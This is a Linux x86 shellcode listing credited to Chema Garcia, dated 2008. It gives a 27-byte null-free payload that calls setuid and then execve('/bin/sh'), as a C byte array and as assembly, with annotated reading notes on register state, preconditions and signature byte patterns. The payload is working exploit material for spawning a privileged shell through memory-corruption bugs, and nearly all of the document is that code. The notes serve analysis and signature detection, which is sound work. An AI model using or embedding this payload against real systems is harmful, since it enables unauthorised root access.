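-----------[ C Source Code ]-----------
/*
 * Smallest GNU/Linux x86 setuid(0) && execve("/bin/sh",0,0) Shellcode without NULLs
 *
 * Coded by Chema Garcia (aka sch3m4)
 *   + sch3m4@opensec.es
 *   + http://opensec.es
 *
 * Shellcode Size: 27 bytes
 * Date: 13/11/2008
 */

/*
 * Reading notes (analysis of the listing below):
 *
 *  - Two i386 `int 0x80` system calls are issued: al = 0x17 (setuid) and
 *    al = 0x0b (execve). pusha/popa bracket the first call so that eax,
 *    which the kernel overwrites with the return value, is restored with
 *    its upper bytes still zero before `mov al,0xb`.
 *  - Only eax, ecx and (for execve) ebx are loaded by this code. ebx during
 *    the first call and edx during the second keep whatever value they had
 *    on entry, so the "(0)" and ",0,0)" in the title hold only when those
 *    registers are already zero.
 *  - The two pushed dwords (0x68732f6e, 0x69622f2f) plus the pushed zero in
 *    ecx build the NUL-terminated string "//bin/sh" on the stack; together
 *    with the CD 80 opcodes they are stable byte patterns for signature
 *    matching.
 *  - setuid(0) can only succeed in a process that already holds the needed
 *    privilege, and a payload held in a data buffer only runs where that
 *    memory is executable.
 */
#include <stdio.h>

/* 27 opcode bytes; the string literal's implicit terminator is the 28th. */
const char shellcode[] =
    "\x31\xC0"              /* xor  eax,eax                     */
    "\x31\xC9"              /* xor  ecx,ecx                     */
    "\xB0\x17"              /* mov  al,17h    ; setuid number   */
    "\x60"                  /* pusha                            */
    "\xCD\x80"              /* int  80h                         */
    "\x61"                  /* popa                             */
    "\x51"                  /* push ecx       ; string NUL      */
    "\x68\x6E\x2F\x73\x68"  /* push 0x68732f6e ; "n/sh"         */
    "\x68\x2F\x2F\x62\x69"  /* push 0x69622f2f ; "//bi"         */
    "\x89\xE3"              /* mov  ebx,esp   ; path pointer    */
    "\xB0\x0B"              /* mov  al,0xb    ; execve number   */
    "\xCD\x80";             /* int  0x80                        */

/*
 * Prints the banner and the payload length. The call through the array is
 * left commented out, as in the original listing, so this program only
 * reports the size.
 */
int main(void)
{
    /* sizeof yields size_t, so the matching conversion is %zu (not %d);
     * the -1 drops the literal's trailing NUL from the count. */
    printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode without NULLs"
           "\n\nCoded by Chema Garcia (aka sch3m4)"
           "\n\t + sch3m4@opensec.es"
           "\n\t + http://opensec.es"
           "\n\n[+] Shellcode Size: %zu bytes\n\n",
           sizeof(shellcode) - 1);

    //(*(void (*)()) shellcode)();

    return 0;
}
-----------[/ C Source Code ]-----------

-----------[ ASM Source Code ]-----------
global _start
section .text
_start:
    xor  eax,eax
    xor  ecx,ecx
    mov  al,17h
    pusha                ; keep eax/ecx intact across the syscall
    int  80h             ;setuid (uid argument is ebx, not set in this listing)
    popa
    push ecx             ; zero dword terminates the path string
    push 0x68732f6e      ; "n/sh"
    push 0x69622f2f      ; "//bi"
    mov  ebx, esp        ; ebx -> "//bin/sh"
    mov  al,0xb
    int  0x80            ;execve (ecx = 0; edx is not set in this listing)
-----------[/ ASM Source Code ]-----------

Greetings,
Chema García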